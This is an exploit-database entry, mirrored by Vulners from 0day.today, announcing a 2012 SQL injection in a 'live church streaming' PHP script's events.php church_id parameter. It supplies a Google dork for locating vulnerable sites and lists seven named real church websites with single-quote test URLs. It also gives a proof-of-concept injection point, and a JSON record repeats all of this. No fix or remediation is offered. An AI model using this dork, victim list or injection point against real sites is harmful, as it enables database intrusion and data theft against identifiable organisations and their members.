Search...

live church streaming (events.php) SQL Injection Vulnerability

2012-10-08T00:00:00

ID 1337DAY-ID-19531
Type zdt
Reporter Mouh Marvel-Dz
Modified 2012-10-08T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #########################################################################
# Exploit Title: [ live church streaming (events.php) SQL Injection Vulnerability ]                 
# Date: [08-10-2012]                                                    
# Author: [Mouh Marvel-Dz]                                    
# Facebook : http://www.facebook.com/mouh.marvel                      
# Category: [webapps]                                                    
# Google dork: intext:Powered by live church streaming inurl:events.php?type=archive church_id=
# Tested on: [Windows 7 ]                                               
#########################################################################

Example Sites : 

http://www.faithministrieslive.com/events.php?type=archive&church_id=106'
http://www.lifepointlebanonlive.com/events.php?type=archive&church_id=68'
http://www.praisecenterlive.com/events.php?type=archive&church_id=50'
http://www.nbwclive.com/events.php?type=archive&church_id=70'
http://www.newgracelive.com/events.php?type=archive&church_id=59'
http://www.worshipandwordlive.com/events.php?type=archive&church_id=107'
http://www.lteelive.com/events.php?type=archive&church_id=79'


and more in Google


[~]Exploit/p0c : http://www.site.com/events.php?type=archive&church_id=[SQLi]


Greetz [ ShinoBi-Dz / Team R00t / Arm4dill0.DZ / Laze De Pique ] 

                     -[Freedom to Palestine]-



#  0day.today [2018-02-16]  #

JSON Vulners Source

Initial Source

{"published": "2012-10-08T00:00:00", "id": "1337DAY-ID-19531", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for php platform in category web applications", "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2018-02-16T07:17:23", "rev": 2}, "dependencies": {"references": [], "modified": "2018-02-16T07:17:23", "rev": 2}, "vulnersScore": 0.3}, "type": "zdt", "lastseen": "2018-02-16T07:17:23", "edition": 2, "title": "live church streaming (events.php) SQL Injection Vulnerability", "href": "https://0day.today/exploit/description/19531", "modified": "2012-10-08T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/19531", "references": [], "reporter": "Mouh Marvel-Dz", "sourceData": "#########################################################################\r\n# Exploit Title: [ live church streaming (events.php) SQL Injection Vulnerability ] \r\n# Date: [08-10-2012] \r\n# Author: [Mouh Marvel-Dz] \r\n# Facebook : http://www.facebook.com/mouh.marvel \r\n# Category: [webapps] \r\n# Google dork: intext:Powered by live church streaming inurl:events.php?type=archive church_id=\r\n# Tested on: [Windows 7 ] \r\n#########################################################################\r\n\r\nExample Sites : \r\n\r\nhttp://www.faithministrieslive.com/events.php?type=archive&church_id=106'\r\nhttp://www.lifepointlebanonlive.com/events.php?type=archive&church_id=68'\r\nhttp://www.praisecenterlive.com/events.php?type=archive&church_id=50'\r\nhttp://www.nbwclive.com/events.php?type=archive&church_id=70'\r\nhttp://www.newgracelive.com/events.php?type=archive&church_id=59'\r\nhttp://www.worshipandwordlive.com/events.php?type=archive&church_id=107'\r\nhttp://www.lteelive.com/events.php?type=archive&church_id=79'\r\n\r\n\r\nand more in Google\r\n\r\n\r\n[~]Exploit/p0c : http://www.site.com/events.php?type=archive&church_id=[SQLi]\r\n\r\n\r\nGreetz [ ShinoBi-Dz / Team R00t / Arm4dill0.DZ / Laze De Pique ] \r\n\r\n -[Freedom to Palestine]-\r\n\r\n\n\n# 0day.today [2018-02-16] #", "immutableFields": []}